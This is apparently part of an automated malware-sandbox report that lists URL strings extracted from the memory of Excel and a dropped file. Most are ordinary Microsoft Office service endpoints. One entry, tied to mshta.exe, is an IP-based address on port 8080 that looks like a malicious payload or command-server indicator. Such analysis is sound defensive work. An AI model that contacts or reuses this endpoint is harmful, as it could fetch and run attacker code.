      Source: EXCEL.EXE, 00000000.00000003.261353142.00000000131FF000.00000004.00000001.sdmpString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkeyhttps://login.windows.net/common/oau
      Source: EXCEL.EXE, 00000000.00000003.462955973.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.262867755.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263246828.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544699284.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350831613.0000000015A18000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261230471.0000000015A31000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
      Source: EXCEL.EXE, 00000000.00000003.261328451.000000001320F000.00000004.00000001.sdmpString found in binary or memory: https://cloudfiles.onenote.com/upload.aspxOneNoteCloudFilesConsumerEmbedhttps://onedrive.live.com/em
      Source: EXCEL.EXE, 00000000.00000003.396504480.0000000012FCB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.543540101.0000000012F99000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://config.edge.skype.com
      Source: EXCEL.EXE, 00000000.00000003.462955973.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.262867755.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263246828.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544699284.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350831613.0000000015A18000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261230471.0000000015A31000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://config.edge.skype.com/config/v1/Office
      Source: EXCEL.EXE, 00000000.00000003.462955973.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.262867755.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263246828.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544699284.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350831613.0000000015A18000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261230471.0000000015A31000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://config.edge.skype.com/config/v2/Office
      Source: D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://cortana.ai
      Source: D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://cortana.ai/api
      Source: EXCEL.EXE, 00000000.00000003.463050039.0000000013215000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.396929162.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544045161.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263447705.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350253673.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.460111881.0000000013215000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.459950914.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.383864499.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261336835.000000001321E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.383803999.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263029066.0000000013209000.00000004.00000001.sdmpString found in binary or memory: https://cortana.ai/api5
      Source: EXCEL.EXE, 00000000.00000003.463050039.0000000013215000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.396929162.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544045161.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263447705.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350253673.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.460111881.0000000013215000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.459950914.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.383864499.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261336835.000000001321E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.383803999.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263029066.0000000013209000.00000004.00000001.sdmpString found in binary or memory: https://cortana.ai/apiA
      Source: EXCEL.EXE, 00000000.00000003.261353142.00000000131FF000.00000004.00000001.sdmpString found in binary or memory: https://cortana.ai/apiBearer
      Source: EXCEL.EXE, 00000000.00000003.261353142.00000000131FF000.00000004.00000001.sdmpString found in binary or memory: https://cortana.ai/apihttps://login.windows.net/common/oauth2/authorize
      Source: EXCEL.EXE, 00000000.00000003.463050039.0000000013215000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.396929162.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544045161.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263447705.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350253673.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.460111881.0000000013215000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.459950914.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.383864499.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261336835.000000001321E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.383803999.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263029066.0000000013209000.00000004.00000001.sdmpString found in binary or memory: https://cortana.aietl
      Source: EXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://cr.office.com
      Source: EXCEL.EXE, 00000000.00000003.463050039.0000000013215000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.396929162.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544045161.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263447705.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350253673.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.460111881.0000000013215000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.459950914.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.383864499.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261336835.000000001321E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.383803999.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263029066.0000000013209000.00000004.00000001.sdmpString found in binary or memory: https://cr.office.com~
      Source: D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://dataservice.o365filtering.com
      Source: D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://dataservice.o365filtering.com/
      Source: EXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
      Source: EXCEL.EXE, 00000000.00000003.261353142.00000000131FF000.00000004.00000001.sdmpString found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFileBearer
      Source: EXCEL.EXE, 00000000.00000003.459410247.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350232384.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.397001902.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263009518.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.460721096.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.383781939.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263429090.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544023705.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.463256033.00000000131E6000.00000004.00000001.sdmpString found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFilefully
      Source: EXCEL.EXE, 00000000.00000003.261328451.000000001320F000.00000004.00000001.sdmpString found in binary or memory: https://dataservice.o365filtering.com/https://login.windows.net/common/oauth2/authorize
      Source: EXCEL.EXE, 00000000.00000003.462955973.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.262867755.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263246828.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544699284.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350831613.0000000015A18000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261230471.0000000015A31000.00000004.00000001.sdmpString found in binary or memory: https://dataservice.o365filtering.comZvk
      Source: EXCEL.EXE, 00000000.00000003.462955973.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.262867755.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263246828.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544699284.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350831613.0000000015A18000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261230471.0000000015A31000.00000004.00000001.sdmpString found in binary or memory: https://dataservice.o365filtering.comxiu
      Source: EXCEL.EXE, 00000000.00000003.459410247.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350232384.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.397001902.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263009518.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.460721096.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.383781939.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263429090.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544023705.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.463256033.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
      Source: EXCEL.EXE, 00000000.00000003.261353142.00000000131FF000.00000004.00000001.sdmpString found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFileBearer
      Source: EXCEL.EXE, 00000000.00000003.396504480.0000000012FCB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.543540101.0000000012F99000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
      Source: EXCEL.EXE, 00000000.00000003.261328451.000000001320F000.00000004.00000001.sdmpString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPoliciesBearer
      Source: D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://dev.cortana.ai
      Source: EXCEL.EXE, 00000000.00000003.261353142.00000000131FF000.00000004.00000001.sdmpString found in binary or memory: https://dev.cortana.aiBearer
      Source: EXCEL.EXE, 00000000.00000003.261353142.00000000131FF000.00000004.00000001.sdmpString found in binary or memory: https://dev.cortana.aihttps://login.windows.net/common/oauth2/authorize
      Source: EXCEL.EXE, 00000000.00000003.462955973.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.262867755.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263246828.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544699284.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350831613.0000000015A18000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261230471.0000000015A31000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
      Source: EXCEL.EXE, 00000000.00000003.462955973.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.262867755.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263246828.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544699284.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350831613.0000000015A18000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261230471.0000000015A31000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://dev0-api.acompli.net/autodetect
      Source: EXCEL.EXE, 00000000.00000002.543540101.0000000012F99000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://devnull.onenote.com
      Source: EXCEL.EXE, 00000000.00000003.261328451.000000001320F000.00000004.00000001.sdmpString found in binary or memory: https://devnull.onenote.comBearer
      Source: EXCEL.EXE, 00000000.00000003.261328451.000000001320F000.00000004.00000001.sdmpString found in binary or memory: https://devnull.onenote.comMBI_SSL_SHORT
      Source: mshta.exe, 0000001A.00000003.469104734.0000020F088BC000.00000004.00000001.sdmp, mshta.exe, 0000001A.00000002.534411624.0000020F088B5000.00000004.00000020.sdmpString found in binary or memory: https://di.129.254.152:8080/
      Source: EXCEL.EXE, 00000000.00000003.463050039.0000000013215000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.396929162.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544045161.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263447705.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350253673.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.460111881.0000000013215000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.459950914.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.383864499.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261336835.000000001321E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.383803999.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263029066.0000000013209000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://directory.services.
      Source: EXCEL.EXE, 00000000.00000003.462955973.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.262867755.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263246828.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544699284.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350831613.0000000015A18000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261230471.0000000015A31000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://ecs.office.com/config/v2/Office
      Source: EXCEL.EXE, 00000000.00000002.543479968.0000000012F44000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://enrichment.osi.office.net/
      Source: EXCEL.EXE, 00000000.00000002.543479968.0000000012F44000.00000004.00000001.sdmpString found in binary or memory: https://enrichment.osi.office.net/D_
      Source: EXCEL.EXE, 00000000.00000003.462955973.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.262867755.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263246828.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544699284.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350831613.0000000015A18000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261230471.0000000015A31000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Refresh/v1
      Source: EXCEL.EXE, 00000000.00000003.261353142.00000000131FF000.00000004.00000001.sdmpString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Refresh/v1AuthorizationBearer
      Source: EXCEL.EXE, 00000000.00000003.462955973.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.262867755.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263246828.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544699284.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350831613.0000000015A18000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261230471.0000000015A31000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Resolve/v1
      Source: EXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Search/v1
      Source: EXCEL.EXE, 00000000.00000003.462955973.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.262867755.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263246828.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544699284.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350831613.0000000015A18000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261230471.0000000015A31000.00000004.00000001.sdmpString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Search/v1$
      Source: EXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/StockHistory/v1
      Source: EXCEL.EXE, 00000000.00000003.462955973.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.262867755.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263246828.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544699284.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350831613.0000000015A18000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261230471.0000000015A31000.00000004.00000001.sdmpString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/StockHistory/v1C
      Source: EXCEL.EXE, 00000000.00000003.462955973.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.262867755.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263246828.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544699284.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350831613.0000000015A18000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261230471.0000000015A31000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/ipcheck/v1
      Source: EXCEL.EXE, 00000000.00000003.261353142.00000000131FF000.00000004.00000001.sdmpString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/ipcheck/v1EnrichmentWACUrlhttps://enrichment.osi.
      Source: EXCEL.EXE, 00000000.00000003.462955973.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.262867755.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263246828.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544699284.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350831613.0000000015A18000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261230471.0000000015A31000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/
      Source: EXCEL.EXE, 00000000.00000003.261353142.00000000131FF000.00000004.00000001.sdmpString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/EnrichmentMetadataUrlhttps://enrichm
      Source: EXCEL.EXE, 00000000.00000003.459410247.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350232384.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.397001902.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263009518.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.460721096.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.383781939.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263429090.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544023705.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.463256033.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/Metadata/metadata.json
      Source: EXCEL.EXE, 00000000.00000003.459410247.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350232384.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.397001902.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263009518.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.460721096.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.383781939.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263429090.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544023705.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.463256033.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/desktop/main.cshtml
      Source: EXCEL.EXE, 00000000.00000003.261353142.00000000131FF000.00000004.00000001.sdmpString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/desktop/main.cshtmlEnrichmentDisambiguat
      Source: EXCEL.EXE, 00000000.00000003.459410247.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350232384.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.397001902.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263009518.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.460721096.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.383781939.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263429090.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544023705.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.463256033.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/web/view/web/main.cshtml
      Source: EXCEL.EXE, 00000000.00000003.261353142.00000000131FF000.00000004.00000001.sdmpString found in binary or memory: https://enrichment.osi.office.net/https://login.windows.net/common/oauth2/authorizeMBI_SSLhttps://os
      Source: EXCEL.EXE, 00000000.00000002.543479968.0000000012F44000.00000004.00000001.sdmpString found in binary or memory: https://enrichment.osi.office.net/j_=
      Source: EXCEL.EXE, 00000000.00000003.462955973.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.262867755.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263246828.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544699284.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350831613.0000000015A18000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261230471.0000000015A31000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://entitlement.diagnostics.office.com
      Source: EXCEL.EXE, 00000000.00000003.462955973.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.262867755.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263246828.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544699284.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350831613.0000000015A18000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261230471.0000000015A31000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://entitlement.diagnosticssdf.office.com
      Source: EXCEL.EXE, 00000000.00000002.543479968.0000000012F44000.00000004.00000001.sdmpString found in binary or memory: https://entity.osi.office.net/t
      Source: EXCEL.EXE, 00000000.00000003.459410247.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350232384.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.397001902.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263009518.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.460721096.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.383781939.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263429090.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544023705.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.463256033.00000000131E6000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drString found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
      Source: EXCEL.EXE, 00000000.00000003.261328451.000000001320F000.00000004.00000001.sdmpString found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechBearer
